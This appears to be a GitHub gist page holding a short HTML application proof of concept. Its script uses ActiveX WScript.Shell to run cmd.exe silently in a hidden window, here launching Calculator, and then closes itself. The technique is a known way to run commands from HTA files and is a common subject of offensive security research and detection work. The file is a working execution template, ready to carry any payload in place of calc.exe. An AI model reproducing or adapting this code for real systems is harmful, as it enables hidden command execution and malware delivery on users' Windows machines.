Skip to content

Instantly share code, notes, and snippets.

@bohops
Created March 14, 2018 21:32
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save bohops/db5f5dc59330b4abfb9c653df21bddba to your computer and use it in GitHub Desktop.
Save bohops/db5f5dc59330b4abfb9c653df21bddba to your computer and use it in GitHub Desktop.
<html><head><script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script></head></html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment